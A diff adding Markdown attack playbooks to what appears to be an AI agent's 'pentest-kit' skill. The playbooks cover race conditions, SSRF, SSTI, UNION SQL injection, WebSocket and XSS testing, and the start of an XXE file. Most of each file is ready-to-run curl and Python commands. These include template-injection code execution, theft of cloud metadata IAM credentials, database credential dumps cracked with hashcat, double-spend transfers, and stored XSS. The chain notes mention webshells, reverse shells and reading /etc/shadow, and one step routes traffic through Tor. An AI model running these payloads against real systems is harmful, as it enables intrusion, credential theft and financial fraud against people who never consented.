+pentest-kit exec bash -c "nuclei -u '$TARGET' -tags prototype-pollution -jsonl -o /tmp/pp-nuclei.jsonl && cat /tmp/pp-nuclei.jsonl"
+```
+
+## Common pitfalls
+
+- Pollution is global on the server — one test can break the app for all users
+- Some frameworks freeze prototypes (`Object.freeze(Object.prototype)`) — pollution silently fails
+- `__proto__` in JSON is parsed by V8 but some JSON parsers strip it
+- Always test in a controlled environment first; server-side pollution can crash the process
+
+## Chain opportunities
+
+- Prototype pollution + SSTI: pollute template engine options to inject template code
+- Prototype pollution + privilege escalation: set `isAdmin=true` on Object.prototype
+- Prototype pollution + DoS: set `toString` or `valueOf` to crash serialization
+- Client-side pollution + DOM XSS: pollute properties consumed by innerHTML sinks

--- a/.claude/skills/pentest-kit/patterns/race-condition-testing.md
+++ b/.claude/skills/pentest-kit/patterns/race-condition-testing.md
@@ -1,0 +1,112 @@
+# Pattern: Race Condition Testing
+
+Identify state-changing operations vulnerable to TOCTOU (time-of-check-time-of-use) bugs, send parallel requests, and verify double-spend or double-action outcomes.
+
+## When to use
+
+- Application has state-changing operations (transfers, coupon redemption, voting, purchases)
+- Business logic relies on check-then-act patterns without proper locking
+- Single-use tokens, invite codes, or discount codes are present
+- Withdrawal, balance deduction, or inventory decrement operations exist
+
+## Step-by-step
+
+### Step 1: Identify state-changing endpoints
+
+Look for POST/PUT/PATCH endpoints that modify server state.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/account' -o /tmp/race-account.json && cat /tmp/race-account.json"
+```
+
+Typical targets: coupon apply, fund transfer, item purchase, vote submit, password change.
+
+### Step 2: Capture a valid request
+
+Record the exact request that performs the state change.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/apply-coupon' -X POST -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"code\":\"DISCOUNT50\"}' -D /tmp/race-headers.txt -o /tmp/race-single.json && cat /tmp/race-single.json"
+```
+
+### Step 3: Verify initial state
+
+Check the current balance/state before the race.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/account/balance' -H 'Cookie: session=SESSION_TOKEN' -o /tmp/race-before.json && cat /tmp/race-before.json"
+```
+
+### Step 4: Send parallel requests with bash
+
+Fire multiple identical requests simultaneously using background processes.
+
+```bash
+pentest-kit exec bash -c "for i in \$(seq 1 10); do curl -sk '$TARGET/api/apply-coupon' -X POST -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"code\":\"DISCOUNT50\"}' -o /tmp/race-resp-\$i.json & done; wait; for i in \$(seq 1 10); do echo \"--- Response \$i ---\"; cat /tmp/race-resp-\$i.json; done"
+```
+
+### Step 5: Verify post-race state
+
+Check if the coupon was applied multiple times or balance was deducted incorrectly.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/account/balance' -H 'Cookie: session=SESSION_TOKEN' -o /tmp/race-after.json && echo '=== BEFORE ===' && cat /tmp/race-before.json && echo '=== AFTER ===' && cat /tmp/race-after.json"
+```
+
+### Step 6: Test fund transfer double-spend
+
+If account has balance of 100, try transferring 100 twice simultaneously.
+
+```bash
+pentest-kit exec bash -c "for i in 1 2; do curl -sk '$TARGET/api/transfer' -X POST -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"to\":\"attacker\",\"amount\":100}' -o /tmp/race-transfer-\$i.json & done; wait; cat /tmp/race-transfer-*.json"
+```
+
+### Step 7: Test with higher concurrency
+
+Increase parallel requests to widen the race window.
+
+```bash
+pentest-kit exec bash -c "seq 1 50 | xargs -P 50 -I {} curl -sk '$TARGET/api/apply-coupon' -X POST -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"code\":\"DISCOUNT50\"}' -o /tmp/race-high-{}.json; grep -l 'success' /tmp/race-high-*.json | wc -l"
+```
+
+### Step 8: Test with single-packet attack (Turbo Intruder style)
+
+Send all requests in a single TCP connection to minimize network jitter.
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import socket, ssl, threading
+host = '\$TARGET'.replace('https://','').replace('http://','').split('/')[0]
+port = 443
+req = b'POST /api/apply-coupon HTTP/1.1\r\nHost: ' + host.encode() + b'\r\nCookie: session=SESSION_TOKEN\r\nContent-Type: application/json\r\nContent-Length: 22\r\n\r\n{\\\"code\\\":\\\"DISCOUNT50\\\"}'
+ctx = ssl.create_default_context()
+ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE
+s = ctx.wrap_socket(socket.socket(), server_hostname=host)
+s.connect((host, port))
+for i in range(10): s.send(req)
+print(s.recv(8192).decode(errors='ignore')[:500])
+s.close()
+\""
+```
+
+### Step 9: Analyze results
+
+Count successful responses vs expected single success.
+
+```bash
+pentest-kit exec bash -c "echo 'Successful applies:' && grep -rl 'success\\|applied\\|true' /tmp/race-resp-*.json | wc -l && echo 'Expected: 1'"
+```
+
+## Common pitfalls
+
+- Network latency can prevent requests from hitting the server simultaneously
+- Use same TCP connection or HTTP/2 multiplexing for tighter race window
+- Some frameworks serialize requests per session — test with different sessions
+- Database-level locks may prevent races — the race is in application-level logic
+
+## Chain opportunities
+
+- Race condition + coupon: apply single-use coupon multiple times for free items
+- Race condition + withdrawal: overdraw account balance
+- Race condition + invite code: redeem limited invite multiple times
+- Race condition + voting: cast multiple votes in polls or rating systems

--- a/.claude/skills/pentest-kit/patterns/ssrf-detection.md
+++ b/.claude/skills/pentest-kit/patterns/ssrf-detection.md
@@ -1,0 +1,114 @@
+# Pattern: SSRF Detection and Exploitation
+
+Identify URL-consuming parameters, test internal network access, reach cloud metadata services, and confirm with out-of-band callbacks.
+
+## When to use
+
+- Application fetches URLs on behalf of the user (webhooks, image imports, PDF generators)
+- Parameters contain URLs, hostnames, or IP addresses
+- Cloud-hosted target (AWS, GCP, Azure) where metadata endpoints are reachable
+- Need to pivot from SSRF to internal service access or credential theft
+
+## Step-by-step
+
+### Step 1: Identify URL-consuming parameters
+
+Look for parameters named `url`, `src`, `href`, `redirect`, `callback`, `webhook`, `feed`.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET' -o /tmp/ssrf-page.html && grep -oiP '(url|src|href|redirect|callback|webhook|feed|proxy|dest|target)=' /tmp/ssrf-page.html | sort -u"
+```
+
+### Step 2: Test with external canary
+
+Use a collaborator/webhook to confirm the server makes outbound requests.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://COLLABORATOR_DOMAIN/ssrf-test' -o /tmp/ssrf-ext.html && cat /tmp/ssrf-ext.html"
+```
+
+Replace `COLLABORATOR_DOMAIN` with your Burp Collaborator or interactsh domain.
+
+### Step 3: Test localhost access
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://127.0.0.1/' -o /tmp/ssrf-localhost.html && head -20 /tmp/ssrf-localhost.html"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://localhost:8080/admin' -o /tmp/ssrf-admin.html && head -20 /tmp/ssrf-admin.html"
+```
+
+### Step 4: Bypass IP filters
+
+Try alternative representations of 127.0.0.1:
+
+```bash
+pentest-kit exec bash -c "for ip in '127.1' '0x7f000001' '017700000001' '2130706433' '127.0.0.1.nip.io'; do echo \"--- \$ip ---\"; curl -sk '$TARGET/fetch?url=http://'\$ip'/' -o /dev/null -w 'status=%{http_code} size=%{size_download}\n'; done"
+```
+
+### Step 5: Scan internal network range
+
+Sweep common internal IPs for live services.
+
+```bash
+pentest-kit exec bash -c "for i in \$(seq 1 255); do resp=\$(curl -sk -o /dev/null -w '%{http_code}' --max-time 2 '$TARGET/fetch?url=http://192.168.0.'\$i':8080/'); [ \"\$resp\" != \"000\" ] && echo \"192.168.0.\$i -> \$resp\"; done"
+```
+
+### Step 6: Access cloud metadata (AWS)
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://169.254.169.254/latest/meta-data/' -o /tmp/ssrf-aws-meta.txt && cat /tmp/ssrf-aws-meta.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/' -o /tmp/ssrf-aws-role.txt && cat /tmp/ssrf-aws-role.txt"
+```
+
+### Step 7: Access cloud metadata (GCP / Azure)
+
+GCP:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://metadata.google.internal/computeMetadata/v1/?recursive=true' -o /tmp/ssrf-gcp.txt && cat /tmp/ssrf-gcp.txt"
+```
+
+Azure:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01' -o /tmp/ssrf-azure.txt && cat /tmp/ssrf-azure.txt"
+```
+
+### Step 8: Test DNS rebinding
+
+Use a DNS rebinding service that alternates between external and internal IPs.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=http://7f000001.REBIND_DOMAIN/' -o /tmp/ssrf-rebind.html && head -20 /tmp/ssrf-rebind.html"
+```
+
+### Step 9: Test protocol smuggling
+
+Try non-HTTP protocols if the URL parser permits.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=file:///etc/passwd' -o /tmp/ssrf-file.txt && head -5 /tmp/ssrf-file.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/fetch?url=gopher://127.0.0.1:6379/_INFO' -o /tmp/ssrf-gopher.txt && head -10 /tmp/ssrf-gopher.txt"
+```
+
+## Common pitfalls
+
+- IMDSv2 (AWS) requires a token via PUT first — simple GET to 169.254.169.254 returns 401
+- GCP metadata requires `Metadata-Flavor: Google` header — test if the app forwards custom headers
+- DNS rebinding needs the server to re-resolve DNS (no caching) — may not work with all parsers
+- Some SSRF filters check resolved IP — use TOCTOU with DNS rebinding to bypass
+
+## Chain opportunities
+
+- SSRF + cloud metadata: steal IAM credentials, pivot to S3/GCS/Azure Storage
+- SSRF + internal admin panel: access unauthenticated admin on localhost
+- SSRF + Redis/Memcached: write cron jobs or SSH keys via gopher protocol
+- SSRF + blind read: exfiltrate internal responses via OOB (DNS or webhook)

--- a/.claude/skills/pentest-kit/patterns/ssti-detection.md
+++ b/.claude/skills/pentest-kit/patterns/ssti-detection.md
@@ -1,0 +1,110 @@
+# Pattern: Server-Side Template Injection (SSTI) Detection and Exploitation
+
+Probe for template injection with math expressions, identify the template engine, and escalate to RCE per engine.
+
+## When to use
+
+- Application renders user input inside templates (email templates, PDF generators, CMS pages)
+- Input is reflected in the response with potential template processing
+- Error messages reveal template engine names or syntax
+- Custom greeting pages, invoice generators, or dynamic content builders
+
+## Step-by-step
+
+### Step 1: Probe with polyglot detection string
+
+Send a universal fuzzing string that triggers errors across engines.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name=\${{<%[%\x27\x22}}}}%\\' -o /tmp/ssti-fuzz.html && head -30 /tmp/ssti-fuzz.html"
+```
+
+### Step 2: Test math expressions per engine family
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name={{7*7}}' -o /tmp/ssti-jinja.html && grep -o '49' /tmp/ssti-jinja.html && echo 'Jinja2/Twig/Tornado candidate'"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name=\${7*7}' -o /tmp/ssti-freemarker.html && grep -o '49' /tmp/ssti-freemarker.html && echo 'Freemarker/Mako candidate'"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name=<%= 7*7 %>' -o /tmp/ssti-erb.html && grep -o '49' /tmp/ssti-erb.html && echo 'ERB/Slim candidate'"
+```
+
+### Step 3: Differentiate Jinja2 from Twig
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name={{7*\"7\"}}' -o /tmp/ssti-diff.html && cat /tmp/ssti-diff.html | grep -oP '(49|7777777)'"
+```
+
+If output is `7777777` it is Jinja2 (string multiplication). If `49` it is Twig.
+
+### Step 4: Exploit Jinja2 (Python) — RCE
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name={{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}' -o /tmp/ssti-jinja-rce.html && cat /tmp/ssti-jinja-rce.html"
+```
+
+Alternative via MRO chain:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile' -X POST -d 'name={{\"\".__class__.__mro__[1].__subclasses__()[365](\"id\",shell=True,stdout=-1).communicate()[0]}}' -o /tmp/ssti-jinja-mro.html && cat /tmp/ssti-jinja-mro.html"
+```
+
+### Step 5: Exploit Twig (PHP) — RCE
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name={{[\"id\"]|filter(\"system\")}}' -o /tmp/ssti-twig-rce.html && cat /tmp/ssti-twig-rce.html"
+```
+
+Older Twig (< 3.x):
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name={{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}' -o /tmp/ssti-twig-old.html && cat /tmp/ssti-twig-old.html"
+```
+
+### Step 6: Exploit Freemarker (Java) — RCE
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name=<#assign ex=\"freemarker.template.utility.Execute\"?new()>\${ex(\"id\")}' -o /tmp/ssti-fm-rce.html && cat /tmp/ssti-fm-rce.html"
+```
+
+### Step 7: Exploit ERB (Ruby) — RCE
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name=<%= system(\"id\") %>' -o /tmp/ssti-erb-rce.html && cat /tmp/ssti-erb-rce.html"
+```
+
+### Step 8: Exploit Mako (Python) — RCE
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/profile?name=\${__import__(\"os\").popen(\"id\").read()}' -o /tmp/ssti-mako-rce.html && cat /tmp/ssti-mako-rce.html"
+```
+
+### Step 9: Automated scan with nuclei
+
+```bash
+pentest-kit exec bash -c "nuclei -u '$TARGET' -tags ssti -jsonl -o /tmp/ssti-nuclei.jsonl && cat /tmp/ssti-nuclei.jsonl"
+```
+
+### Step 10: Automated scan with tplmap
+
+```bash
+pentest-kit exec bash -c "tplmap -u '$TARGET/profile?name=test' --os-cmd 'id' 2>&1 | head -40"
+```
+
+## Common pitfalls
+
+- URL-encode special characters: `{` = `%7B`, `}` = `%7D`, `$` = `%24`
+- WAFs may block `__class__`, `__mro__` — use attribute access tricks like `|attr('__class__')`
+- Jinja2 sandbox mode blocks direct `os` access — enumerate subclasses to find Popen
+- POST body injection may work when GET parameters are filtered
+
+## Chain opportunities
+
+- SSTI + file read: read config files, database credentials, private keys
+- SSTI + SSRF: make internal HTTP requests from the template engine
+- SSTI + privilege escalation: read `/etc/shadow`, SSH keys, or environment variables
+- SSTI + reverse shell: escalate from command execution to persistent access

--- a/.claude/skills/pentest-kit/patterns/union-sqli-extraction.md
+++ b/.claude/skills/pentest-kit/patterns/union-sqli-extraction.md
@@ -1,0 +1,121 @@
+# Pattern: UNION-Based SQL Injection Extraction
+
+## When to use
+
+- Application reflects query results in the HTTP response body
+- You have confirmed SQL injection exists (e.g., single quote causes error or behavioral change)
+- WAF is not blocking UNION keyword (or you have a bypass)
+- Goal is full schema enumeration and data extraction
+
+## Prerequisites
+
+- Confirmed injection point (parameter, header, cookie)
+- Target URL with injectable parameter identified
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Confirm injection and identify database type
+
+Send error-triggering payloads to fingerprint the backend database.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=1%27' -o /tmp/sqli-err.txt && cat /tmp/sqli-err.txt | head -50"
+```
+
+```bash
+pentest-kit exec bash -c "sqlmap -u '$TARGET/vulnerable?id=1' --batch --fingerprint --level=1 --risk=1 --output-dir=/tmp/sqlmap-fp 2>&1 | tail -30"
+```
+
+Check output for: MySQL, PostgreSQL, MSSQL, Oracle, SQLite.
+
+### Step 2: Determine number of columns with ORDER BY
+
+Increment until an error occurs. The last successful number is the column count.
+
+```bash
+pentest-kit exec bash -c "for i in 1 2 3 4 5 6 7 8 9 10; do CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/vulnerable?id=1+ORDER+BY+\$i--+'); echo \"ORDER BY \$i -> HTTP \$CODE\"; done"
+```
+
+### Step 3: Confirm column count with UNION SELECT NULL
+
+Replace N with the column count found in Step 2. Adjust NULL count to match.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+NULL,NULL,NULL--+' -o /tmp/sqli-union.txt && cat /tmp/sqli-union.txt | head -80"
+```
+
+### Step 4: Find columns that render string data
+
+Replace one NULL at a time with a marker string to see which column displays output.
+
+```bash
+pentest-kit exec bash -c "for i in 1 2 3; do COLS='NULL,NULL,NULL'; COLS=\$(echo \$COLS | sed \"s/NULL/0x41424344/\$i\"); echo \"--- Position \$i ---\"; curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+'\$COLS'--+' | grep -i 'ABCD' || echo 'not reflected'; done"
+```
+
+### Step 5: Extract database version and current user
+
+Use the visible column position from Step 4 (replace second NULL below).
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+NULL,version(),NULL--+' -o /tmp/sqli-ver.txt && cat /tmp/sqli-ver.txt | head -40"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+NULL,current_user(),NULL--+' -o /tmp/sqli-user.txt && cat /tmp/sqli-user.txt | head -40"
+```
+
+### Step 6: Enumerate table names from information_schema
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+NULL,group_concat(table_name),NULL+FROM+information_schema.tables+WHERE+table_schema=database()--+' -o /tmp/sqli-tables.txt && cat /tmp/sqli-tables.txt | head -40"
+```
+
+### Step 7: Enumerate columns for target table
+
+Replace TARGET_TABLE with the table name found in Step 6.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+NULL,group_concat(column_name),NULL+FROM+information_schema.columns+WHERE+table_name=0x$(echo -n 'TARGET_TABLE' | xxd -p)--+' -o /tmp/sqli-cols.txt && cat /tmp/sqli-cols.txt | head -40"
+```
+
+### Step 8: Dump table data
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/vulnerable?id=-1+UNION+SELECT+NULL,group_concat(username,0x3a,password_hash+SEPARATOR+0x0a),NULL+FROM+TARGET_TABLE--+' -o /tmp/sqli-dump.txt && cat /tmp/sqli-dump.txt"
+```
+
+### Step 9: Crack extracted hashes
+
+```bash
+pentest-kit exec bash -c "cat /tmp/sqli-dump.txt | grep -oP '[a-f0-9]{32,}' > /tmp/hashes.txt && hashcat -m 0 /tmp/hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable -o /tmp/cracked.txt 2>&1 | tail -20"
+```
+
+If hashcat is unavailable or GPU is not present, use john:
+
+```bash
+pentest-kit exec bash -c "john /tmp/hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 && john /tmp/hashes.txt --show"
+```
+
+### Step 10: Automate full extraction with sqlmap
+
+```bash
+pentest-kit exec bash -c "sqlmap -u '$TARGET/vulnerable?id=1' --batch --dump --threads=4 --technique=U --output-dir=/tmp/sqlmap-dump 2>&1 | tail -40"
+```
+
+## Common pitfalls
+
+- **Wrong column count**: UNION requires exact match. Off-by-one means no results.
+- **Oracle requires FROM dual**: `UNION SELECT NULL,NULL FROM dual--`
+- **MySQL comments need trailing space**: `-- ` not `--` (use `--+` in URLs).
+- **WAF blocks UNION**: Try case mixing (`uNiOn SeLeCt`), inline comments (`UN/**/ION`), or double URL-encoding.
+- **group_concat truncation**: Default limit is 1024 bytes. Use `GROUP_CONCAT(... SEPARATOR '\n' LIMIT 0,50)` or paginate with LIMIT/OFFSET.
+- **Hex-encoding table names**: Avoids quote issues in WHERE clauses.
+
+## Chain opportunities
+
+- **Credential reuse**: Test cracked passwords against admin panels, SSH, FTP, other services.
+- **File read**: `UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL--` (MySQL with FILE privilege).
+- **File write**: `INTO OUTFILE '/var/www/html/shell.php'` for webshell (MySQL with FILE privilege).
+- **Privilege escalation**: Check if DB user is DBA with `SELECT super_priv FROM mysql.user WHERE user=current_user()`.
+- **Lateral movement**: Extracted credentials may work on other hosts in the environment.

--- a/.claude/skills/pentest-kit/patterns/websocket-testing.md
+++ b/.claude/skills/pentest-kit/patterns/websocket-testing.md
@@ -1,0 +1,124 @@
+# Pattern: WebSocket Security Testing
+
+Fingerprint WebSocket protocol usage, inspect frames for sensitive data, inject payloads, test authentication enforcement, and validate origin checks.
+
+## When to use
+
+- Application uses WebSocket connections (chat, real-time feeds, notifications)
+- `wss://` or `ws://` endpoints discovered during recon
+- Need to test if WebSocket bypasses standard HTTP security controls
+- Looking for cross-site WebSocket hijacking (CSWSH) opportunities
+
+## Step-by-step
+
+### Step 1: Discover WebSocket endpoints
+
+Search page source and JavaScript for WebSocket connection URLs.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET' -o /tmp/ws-page.html && grep -oiP '(wss?://[^\x27\x22 ]+|new WebSocket\\([^\x29]+\\))' /tmp/ws-page.html"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/js/app.js' -o /tmp/ws-app.js && grep -n 'WebSocket\\|socket\\.io\\|ws://' /tmp/ws-app.js"
+```
+
+### Step 2: Test WebSocket handshake
+
+Perform the HTTP upgrade and verify the connection succeeds.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/ws' -H 'Upgrade: websocket' -H 'Connection: Upgrade' -H 'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==' -H 'Sec-WebSocket-Version: 13' -D /tmp/ws-handshake.txt -o /dev/null && cat /tmp/ws-handshake.txt"
+```
+
+Look for `101 Switching Protocols` and `Sec-WebSocket-Accept` in the response.
+
+### Step 3: Connect and inspect frames
+
+Use websocat to connect and observe messages.
+
+```bash
+pentest-kit exec bash -c "echo 'ping' | timeout 5 websocat -1 'ws://$TARGET/ws' 2>&1 | head -20"
+```
+
+For authenticated connections:
+
+```bash
+pentest-kit exec bash -c "echo '{\"type\":\"subscribe\",\"channel\":\"updates\"}' | timeout 5 websocat -1 'ws://$TARGET/ws' -H 'Cookie: session=SESSION_TOKEN' 2>&1 | head -20"
+```
+
+### Step 4: Test for missing authentication
+
+Connect without any session cookie or token.
+
+```bash
+pentest-kit exec bash -c "echo '{\"type\":\"get_messages\"}' | timeout 5 websocat -1 'ws://$TARGET/ws' 2>&1 | head -20"
+```
+
+If sensitive data is returned without authentication, that is a critical finding.
+
+### Step 5: Test origin validation (CSWSH)
+
+Connect with a spoofed Origin header to test for cross-site WebSocket hijacking.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/ws' -H 'Upgrade: websocket' -H 'Connection: Upgrade' -H 'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==' -H 'Sec-WebSocket-Version: 13' -H 'Origin: https://evil.com' -D /tmp/ws-origin.txt -o /dev/null && cat /tmp/ws-origin.txt"
+```
+
+If `101 Switching Protocols` is returned with a malicious origin, CSWSH is possible.
+
+### Step 6: Inject XSS via WebSocket
+
+Send a payload through the WebSocket that may be rendered in another user's browser.
+
+```bash
+pentest-kit exec bash -c "echo '{\"type\":\"message\",\"content\":\"<img src=x onerror=alert(1)>\"}' | timeout 5 websocat -1 'ws://$TARGET/ws' -H 'Cookie: session=SESSION_TOKEN' 2>&1"
+```
+
+### Step 7: Inject SQL via WebSocket
+
+Test if WebSocket messages reach a database query without sanitization.
+
+```bash
+pentest-kit exec bash -c "echo '{\"type\":\"search\",\"query\":\"test\\x27 OR 1=1--\"}' | timeout 5 websocat -1 'ws://$TARGET/ws' -H 'Cookie: session=SESSION_TOKEN' 2>&1 | head -20"
+```
+
+### Step 8: Test rate limiting on WebSocket
+
+Send a burst of messages to check for rate limiting.
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import json
+msgs = []
+for i in range(100):
+    msgs.append(json.dumps({'type':'message','content':f'flood-{i}'}))
+print('\n'.join(msgs))
+\" | timeout 10 websocat 'ws://$TARGET/ws' -H 'Cookie: session=SESSION_TOKEN' 2>&1 | tail -5"
+```
+
+### Step 9: Test for information disclosure in error frames
+
+Send malformed JSON to trigger error responses that may leak server details.
+
+```bash
+pentest-kit exec bash -c "echo '{malformed' | timeout 5 websocat -1 'ws://$TARGET/ws' 2>&1"
+```
+
+```bash
+pentest-kit exec bash -c "echo '{\"type\":\"admin\",\"action\":\"list_users\"}' | timeout 5 websocat -1 'ws://$TARGET/ws' -H 'Cookie: session=SESSION_TOKEN' 2>&1"
+```
+
+## Common pitfalls
+
+- WebSocket traffic is not visible in standard HTTP proxy logs — use Burp's WebSocket history tab
+- `wss://` requires TLS — use `--tls-domain` flag with websocat if needed
+- Socket.IO uses HTTP polling before upgrading — test the polling endpoint too
+- Some WebSocket servers require specific subprotocol headers to accept connections
+
+## Chain opportunities
+
+- CSWSH + authenticated WebSocket: hijack session to read private messages
+- WebSocket XSS + stored: inject payload that renders for all connected clients
+- WebSocket SQLi + data exfil: extract database content through real-time channel
+- Missing auth + IDOR: enumerate other users' data through unauthenticated WebSocket

--- a/.claude/skills/pentest-kit/patterns/xss-dialog-verification.md
+++ b/.claude/skills/pentest-kit/patterns/xss-dialog-verification.md
@@ -1,0 +1,102 @@
+# Pattern: XSS Detection and Dialog Verification
+
+Systematic XSS detection workflow using payload injection, response analysis for dialog events, and verification across reflected, stored, and DOM contexts.
+
+## When to use
+
+- Web application accepts user input rendered in HTML responses
+- Search fields, comment forms, profile fields, URL parameters present
+- Need to confirm XSS is exploitable (not just reflected) via dialog trigger
+- Differentiating reflected vs stored vs DOM-based XSS
+
+## Step-by-step
+
+### Step 1: Identify injection points
+
+Crawl the target and extract parameters that reflect input in responses.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET' | grep -oP '(name|id)=\"[^\"]+\"' | sort -u > /tmp/xss-params.txt && cat /tmp/xss-params.txt"
+```
+
+### Step 2: Probe with canary string
+
+Inject a unique canary to see where and how input is reflected.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/search?q=xss1337canary' -o /tmp/xss-reflect.html && grep -n 'xss1337canary' /tmp/xss-reflect.html"
+```
+
+Check the context: inside an HTML tag, attribute, JavaScript block, or raw body.
+
+### Step 3: Test reflected XSS with dialog payload
+
+Use a payload that triggers `alert`, `prompt`, or `print` — look for `events.dialogs` in headless responses.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/search?q=<script>alert(1)</script>' -o /tmp/xss-reflected.html && grep -ci 'alert\|<script>' /tmp/xss-reflected.html"
+```
+
+If filtered, try event handler variants:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/search?q=<img src=x onerror=alert(1)>' -o /tmp/xss-img.html && grep -ci 'onerror' /tmp/xss-img.html"
+```
+
+### Step 4: Verify with encoding bypasses
+
+Test URL-encoded, double-encoded, and HTML entity payloads.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E' -o /tmp/xss-enc.html && grep -ci '<script>' /tmp/xss-enc.html"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/search?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E' -o /tmp/xss-dblenc.html && grep -ci '<script>' /tmp/xss-dblenc.html"
+```
+
+### Step 5: Test stored XSS
+
+Submit a payload via POST, then fetch the page where it renders.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/comment' -X POST -d 'body=<img src=x onerror=alert(document.domain)>&postId=1' -o /tmp/xss-store-resp.html"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/post?id=1' -o /tmp/xss-stored-check.html && grep -ci 'onerror' /tmp/xss-stored-check.html"
+```
+
+### Step 6: Test DOM-based XSS
+
+Look for client-side sinks that consume URL fragments or query params.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET' -o /tmp/xss-dom.html && grep -oP '(innerHTML|document\.write|eval|location\.(hash|search|href))' /tmp/xss-dom.html"
+```
+
+If sinks found, craft a payload via the fragment:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/#<img src=x onerror=alert(1)>' -o /tmp/xss-dom-trigger.html"
+```
+
+### Step 7: Run automated scanner for confirmation
+
+```bash
+pentest-kit exec bash -c "nuclei -u '$TARGET' -tags xss -jsonl -o /tmp/xss-nuclei.jsonl && cat /tmp/xss-nuclei.jsonl"
+```
+
+## Common pitfalls
+
+- WAF may block `alert` — use `print()`, `prompt()`, or `confirm()` instead
+- CSP `script-src` can prevent inline scripts — check response headers first
+- DOM XSS will not appear in curl output — needs browser or headless tool
+- Stored XSS may require authentication — pass session cookies with `-b`
+
+## Chain opportunities
+
+- XSS + CSRF: steal anti-CSRF tokens then forge state-changing requests
+- XSS + session hijack: exfiltrate cookies if `HttpOnly` is missing
+- XSS + open redirect: chain with OAuth flows to steal authorization codes
+- DOM XSS + prototype pollution: pollute Object.prototype to trigger DOM sinks

--- a/.claude/skills/pentest-kit/patterns/xxe-exploitation.md
+++ b/.claude/skills/pentest-kit/patterns/xxe-exploitation.md
@@ -1,0 +1,143 @@
+# Pattern: XXE Exploitation
+
+## When to use
+
+- Application accepts XML input (API endpoints, file uploads, SOAP services, SVG processing)
+- Content-Type is `application/xml`, `text/xml`, or multipart with XML parts
+- Goal is to read local files, perform SSRF, or exfiltrate data out-of-band
+
